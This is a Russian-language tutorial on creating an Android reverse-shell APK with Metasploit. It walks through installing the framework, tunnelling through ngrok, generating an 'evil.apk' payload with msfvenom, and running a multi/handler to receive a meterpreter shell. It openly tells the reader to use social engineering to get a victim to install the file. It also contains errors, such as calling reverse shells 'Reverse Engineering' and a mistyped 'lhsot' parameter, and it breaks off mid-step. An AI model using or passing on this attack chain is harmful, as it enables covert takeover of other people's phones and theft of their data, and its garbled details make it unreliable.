Как использовать обратную оболочку в Metasploit в Kali Linux
Metasploitis не просто один инструмент. Это полная структура. Это модульная платформа для тестирования на проникновение на основе Ruby, которая позволяет вам писать, тестировать и выполнять код эксплойта, она гибкая и чрезвычайно надежная и имеет множество инструментов для выполнения различных простых и сложных задач. Metasploit Framework создает полезную нагрузку в формате apk, exe и т. д., которую можно выполнить, и как только скрипт запускается, он обеспечивает подключение к системе или телефону жертвы. Платформа Metasploit встроена в большинство операционных систем с ядром Linux, и мы также можем использовать ее в Windows,
Мы можем скачать Metasploit Framework по ссылке ниже:
https://www.metasploit.com/download
В этой статье мы получим обратный доступ к телефону Android с помощью полезной нагрузки.
Что такое обратная оболочка?
Обратная оболочка или оболочка с обратным подключением — это способ захвата системы жертвы из-за ее уязвимостей, дающих доступ к сеансу оболочки системы жертвы. В большинстве случаев обратная оболочка успешна, потому что здесь жертва пускает вас только в свою систему. Конечно, брандмауэр запрещает внешнее соединение, но большинство брандмауэров разрешают любое исходящее соединение. Хакеры используют жертв для проникновения в свою систему, жертва сама позволяет нам подключиться через себя, это называется Reverse Engineering.
Создание обратного сценария оболочки Android с использованием Metasploit-framework
В большинстве систем на базе Linux Metasploit уже установлен, и мы также можем использовать его в Windows, но процесс отличается, в Windows у нас будет GUI (графический интерфейс пользователя), но в Linux у вас будет правильный CLI (Интерфейс командной строки) опыт.
Давайте установим его на наши Linux-системы:
Шаг 1: Установка Metasploit
Запустите терминал и установите его с помощью
sudo apt install metasploit-framework
или же мы можем также клонировать репозиторий Rapid7 на GitHub
git clone https://github.com/rapid7/metasploit-framework
После успешной установки мы можем попробовать запустить консоль Metasploit, просто написав:
msfconsole
Примечание. Если у вас возникли проблемы с установкой, попробуйте клонировать его с GitHub.
Вам будет предложено мигающим курсором с надписью msf6>. Ну, выйдите из этого на данный момент. Для выхода введите
exit
Теперь нам нужно сделать сценарий обратной оболочки для устройства Android, и наилучшим подходящим форматом будет файл .apk.
Шаг 2. Использование службы туннелирования Ngrok
Ngrok — это служба туннелирования, которая позволяет нам подключаться через серверы или системы через глобальную сеть. Он дает доступ к удаленным системам, даже не касаясь их сетей. Это безопасный и надежный сервис туннелирования.
Создайте идентификатор и загрузите файл, после загрузки файла откройте терминал и следуйте инструкциям.
cd <path to ngrok> unzip ngrok.zip
После этого мы увидим разархивированный файл ngrok, теперь мы дали ему токен доступа, который мы получили с вашей панели управления ngrok.
Примечание . Перейдите на сайт, где вы загрузили службу ngrok, вы увидите там свой токен авторизации с помощью команды, скопируйте его.
ngrok config add-authtoken <your token>
Мы увидим, если ничего не произойдет, но токен будет сохранен в вашей системе. теперь попробуйте запустить службу ngrok, чтобы проверить процесс
./ngrok tcp 8080
Здесь мы использовали протокол TCP , поэтому мы должны указать его с номером порта.
Note: Port number can be of your choice 4-digit number.
Шаг 3: Создание полезной нагрузки
Теперь пусть он будет открыт и запустите новый терминал. Мы должны создать полезную нагрузку/скрипт для обратной оболочки. В новом терминале введите следующую команду:
msfvenom -p android/meterpreter/reverse_tcp lhsot=0.tcp.in.ngrok.io lport=<the port address just beside> R> evil.apk
- msfvenom: команда платформы Metasploit, используемая для создания скриптов.
- -p: указание типа полезной нагрузки
- android/meterpreter/reverse_tcp: встроенный скрипт Metasploit, используемый для подключения обратной оболочки Android.
- lhost: для определения хоста.
- lport: для определения адреса порта.
- R>: Чтобы определить имя и местоположение вашей полезной нагрузки.
Теперь все, что вам нужно сделать, это выполнить социальную инженерию и отправить файл apk жертве. Теперь мы должны быть готовы принять соединение, поэтому давайте подготовим для него сессию. Очистите терминал и начните
msfconsole
Это откроет консоль Metasploit, где мы будем принимать соединение.
В настоящее время,
msf6> use exploit/multi/handler msf6> set payload android/meterpreter/reverse_tcp msf6> set LHOST 127.0.0.1 msf6> set LPORT 8080 msf6> exploit -j
если жертва установила apk и запустила его в первый раз, вам будет предложено пройти сеанс meterpreter или обратную оболочку.
После приглашения к сеансу meterpreter введите
help
Мы увидим кучу команд, которые вы можете выполнить с системой жертвы. Давайте попробуем получить сеанс оболочки, просто введите shell
meterpreter> shell
Мы увидим это: